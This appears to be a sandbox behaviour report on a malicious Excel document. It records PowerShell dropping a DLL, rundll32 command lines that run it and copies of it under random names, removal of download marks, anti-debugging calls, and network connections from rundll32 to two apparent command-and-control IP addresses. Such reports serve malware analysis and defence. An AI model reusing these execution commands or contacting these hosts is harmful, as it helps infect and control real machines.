                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKatJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKatJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufPJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbrJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServerJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD509.tmpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_00343C3B CreateToolhelp32Snapshot,17_2_00343C3B
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                            Source: 36E8.tmp.0.drInitial sample: OLE indicators vbamacros = False
                            Source: C:\Windows\System32\mshta.exeCode function: 6_3_034D08CB push 8B490315h; iretd 6_3_034D08D0
                            Source: C:\Windows\System32\mshta.exeCode function: 6_3_034D00C1 push 8B490315h; iretd 6_3_034D00C7
                            Source: C:\Windows\System32\mshta.exeCode function: 6_3_034D08CB push 8B490315h; iretd 6_3_034D08D0
                            Source: C:\Windows\System32\mshta.exeCode function: 6_3_034D00C1 push 8B490315h; iretd 6_3_034D00C7
                            Source: C:\Windows\System32\mshta.exeCode function: 6_3_034D08CB push 8B490315h; iretd 6_3_034D08D0
                            Source: C:\Windows\System32\mshta.exeCode function: 6_3_034D00C1 push 8B490315h; iretd 6_3_034D00C7
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF00260A21 push eax; ret 8_2_000007FF00260C51
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF00260655 push eax; ret 8_2_000007FF00260791
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF002620D0 push eax; ret 8_2_000007FF002620D1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF002623DD push eax; ret 8_2_000007FF002623F1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF00261B30 push eax; ret 8_2_000007FF00261B31
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF00260002 push eax; ret 8_2_000007FF00260021
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF00260000 push eax; ret 8_2_000007FF00260001
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF0026009A push eax; ret 8_2_000007FF002600D9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10032B7D push ecx; ret 11_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10030DFF push ecx; ret 11_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B114C push ds; ret 11_2_002B114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B15F5 push cs; retf 11_2_002B15FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008109F5 push cs; retf 12_2_008109FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081054C push ds; ret 12_2_0081054D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073114C push ds; ret 12_2_0073114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007315F5 push cs; retf 12_2_007315FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10032B7D push ecx; ret 13_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10030DFF push ecx; ret 13_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060114C push ds; ret 13_2_0060114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_006015F5 push cs; retf 13_2_006015FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029114C push ds; ret 14_2_0029114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002915F5 push cs; retf 14_2_002915FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027114C push ds; ret 16_2_0027114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002715F5 push cs; retf 16_2_002715FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0034114C push ds; ret 17_2_0034114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,11_2_1003D873
                            Source: Milossd.dll.8.drStatic PE information: real checksum: 0x8f55d should be: 0x8973e
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\Milossd.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx (copy)Jump to dropped file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\Milossd.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx (copy)Jump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Hides that the sample has been downloaded from the Internet (zone.identifier)
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100134F0 IsIconic,11_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,11_2_10018C9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_100134F0 IsIconic,13_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,13_2_10018C9A
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exe TID: 2552Thread sleep time: -360000s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_11-32031
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: rundll32.exe, 0000000C.00000002.509950436.00000000002AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: rundll32.exe, 0000000E.00000002.559655343.000000000032A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,11_2_10030334
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,13_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0035BAEA FindFirstFileW,17_2_0035BAEA
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,11_2_1003D873
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CD374 mov eax, dword ptr fs:[00000030h]11_2_002CD374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082C774 mov eax, dword ptr fs:[00000030h]12_2_0082C774
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074D374 mov eax, dword ptr fs:[00000030h]12_2_0074D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061D374 mov eax, dword ptr fs:[00000030h]13_2_0061D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AD374 mov eax, dword ptr fs:[00000030h]14_2_002AD374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028D374 mov eax, dword ptr fs:[00000030h]16_2_0028D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0035D374 mov eax, dword ptr fs:[00000030h]17_2_0035D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,11_2_10002280
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,11_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,11_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1003ACCC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,13_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,13_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_1003ACCC

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 74.207.230.120 144Jump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 139.196.72.155 144Jump to behavior
                            Passes commands via pipe to a shell (likely to bypass AV or HIPS)
